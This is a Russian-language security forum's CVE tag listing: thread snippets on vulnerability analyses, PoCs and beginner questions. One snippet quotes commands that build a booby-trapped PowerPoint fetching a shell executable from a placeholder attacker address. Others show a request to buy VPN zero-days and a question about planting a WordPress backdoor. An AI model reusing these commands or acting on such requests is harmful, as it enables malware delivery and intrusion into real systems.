cve

  1. szybnev

    Статья Foxit PDF Reader CVE-2022-28672 RCE: разбор уязвимости

    Интро В этой статье расскажу об уязвимости, обнаруженной при оценке безопасности популярных программ для чтения PDF. На этот раз была обнаружена уязвимость use-after-free и несколько других багов в Foxit PDF Reader во время фаззинга. Мы смогли успешно использовать эту уязвимость для удаленного...
  2. szybnev

    Статья Adobe Acrobat Reader CVE-2023-21608 RCE: разбор уязвимости

    В этой статье мы рассмотрим, как использовалась уязвимость use-after-free в Adobe Acrobat Reader DC. Ошибка была обнаружена в ходе проекта по фаззингу, направленной на популярные программы для чтения PDF. В итоге была успешно использована уязвимость для удаленного выполнения кода в Adobe Acrobat...
  3. szybnev

    Статья Технический анализ Fortinet FortiNAC CVE-2022-39952

    Введение В четверг, 16 февраля 2023 года, компания Fortinet выпустила PSIRT, в котором подробно описана CVE-2022-39952, критическая уязвимость, затрагивающая ее продукт FortiNAC. Эта уязвимость, обнаруженная Gwendal Guégniaud из Fortinet, позволяет неаутентифицированному злоумышленнику записать...
  4. Mark Klintov

    Статья Дырявый Интернет. Топ интересных уязвимостей уходящего 2022 года.

    Введение Работа и типичные декабрьские будни. За окном ощущается настроение Нового Года, а трудиться уже совсем не хочется. Такими словами обычно заканчивается очередной год. Но сегодня стоит обернуться и вспомнить то, что уже давно позади. Давай посчитаем насколько много приключений произошло...
  5. Exited3n

    Заметка CVE-2022-30190 PoC

    Уязвимость CVE-2022-30190 с оценкой 7,8 из 10 затрагивает Microsoft Office 2013, Office 2016, Office 2019 и Office 2021, а также выпуски Professional Plus. Автор - GitHub - JohnHammond/msdt-follina: Codebase to generate an msdt-follina payload Исходные данные: Хост - Kali Жертва - Windows 10 +...
  6. Эксплуатация CVE-2021-40444 через (Microsoft Office Word)

    Эксплуатация CVE-2021-40444 через (Microsoft Office Word)

    Сама по себе уязвимость найдена в MSHTML, движке браузера Internet Explorer.Для атаки создается специальный документ Word и каким-либо образом передают его жертве.В документ встроен вредоносный элемент управления ActiveX, который и позволяет исполнить RCE.
  7. heremy644

    Как использовать эксплойты?

    Всем привет! 3 месяца изучаю тему ИБ. После сканирования портов с nmap (используя --script vuln) будь то веб-сервер, или какая-нибудь машина на htb, отображаются уязвимости СVE и я иду в интернет, чтобы найти эксплойты. Проблема в том, что даже если мне удалось найти нужный эксплойт, я просто...
  8. F

    Я заказчик В поисках 0day, CVE, POC под ВПН/VPN

    Всем привет! Ищу актуальные 0day, CVE, POC под ВПН/VPN. Пишите в ЛС. Спасибо!
  9. K

    Как узнать сборку и версию Windows 10?

    Есть ли возможность узнать номер сборки и версию windows 10 в локальной сети без соц.инженерии? Если есть то как это сделать? Заранее спасибо, буду рад как положительным, так и отрицательным ответам.
  10. Brett Hagen

    ImageTragick CVE-2016-3714

    На тестируемом сервере имеется уязвимость CVE-2016-3714 (ImageTragick Exploitation - CVE-2016-3714 - Mukarram Khalid) однако при загрузке картинки с кодом весь код крошиться и превращается в артефакты 😢 как с этим быть ? Кто именно на сервере отвечает за превращение кода в артефакты? Я там на...
  11. g00db0y

    Статья Воскрешение уязвимости PHPUnit RCE

    Данная статья является переводом. Оригинал вот тут Как только патч для ПО выпущен, мы думаем, что проблема решена, и баг теперь не работает. В большинстве случаев это не так. Для решения этой проблемы от всех разработчиков требуется использование последней версии патча. Поскольку обновление не...
  12. Zer0must2b

    CVE-2020-1938: Ghostcat

    Ghostcat - это уязвимость чтения/включения файлов с высокой степенью риска в Tomcat. Вступление В настоящее время Java является самым популярным языком программирования в веб-разработке, а Tomcat является одним из самых популярных серверов промежуточного программного обеспечения Java. Он...
  13. Zer0must2b

    Статья Как обнаружить уязвимость SACK Panic с помощью Wireshark

    Недавно мы провели углубленный анализ уязвимости SACK Panic (которая впервые была раскрыта в июне 2019 года), чтобы выяснить ее эффективность для машин Linux. В ходе этого исследования мы нашли новый метод обнаружения уязвимых серверов с помощью популярного анализатора сетевого трафика...
  14. g00db0y

    Статья Анализ CVE-2019-2215(/dev/binder UAF)

    За последние несколько недель, я пытался понять недавний Android Binder Use-After-Free (UAF), опубликованный Проектом Google Project Zero (p0). Этот баг на самом деле не новый, проблема была обнаружена и исправлена в основном ядре в феврале 2018 года, однако, p0 обнаружил, что многие популярные...
  15. Pulsera

    Как происходит присваивание CVE

    Всем привет. У меня такой вопрос, как происходит присваивание CVE к уязвимости? Допустим человек нашел уязвимость, сообщил о ней разработчикам, они ее исправляют и дальше что? мне интересно как они присваивают CVE номер и как это становится известно, что информация о уязвимости появляется на...
  16. 9

    Wordpress 3.2.1 exploit

    Hi guys! Sorry for my eng, you may chat in russian, I will understand. Have a problem: already know wordpress version, users and a few vulnerabilities/CVE numbers So... Smb know how and which of them can help to brute passwd or maybe load backdoor/shell?
  17. Л

    Soft Apache Struts v3 - Используем уязвимости.

    Всем привет. Представляю вам новинку. Она проверяет 3 уязвимости. Страница разработчика -== s1kr10s/Apache-Struts-v3 Разработчик -== s1kr10s Введение. Apache Struts v3 - Скрипт , который содержит набор из 3 уязвимостей: 1)CVE-2013-2251 'action:', 'redirect:' and 'redirectAction'...
  18. Dr.Lafa

    Статья CVE-2018-9995 или как получить логин и пароль к DVR камере

    Приветствую, форумчане. Не так давно была обнаружена уязвимость, затрагивающая довольно большое количество камер. Брешь позволяет одним запросом вытащить логины и пароли к веб интерфейсу DVR устройства, откуда, кстати, можно смотреть трансляцию/запись камеры, менять настройки и всё в этом духе...
  19. Tayrus

    Помогите с CVE

    Нашел мануал по вшиванию payload в презентацию. Вот строки python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u http://ВашАйпи/logo.doc python cve-2017-8570_toolkit.py -M exp -e http://ВашАйпи/shell.exe -l /tmp/shell.exe Хотел спросить вот что, чтобы оно скачивало надо порт открыть или не?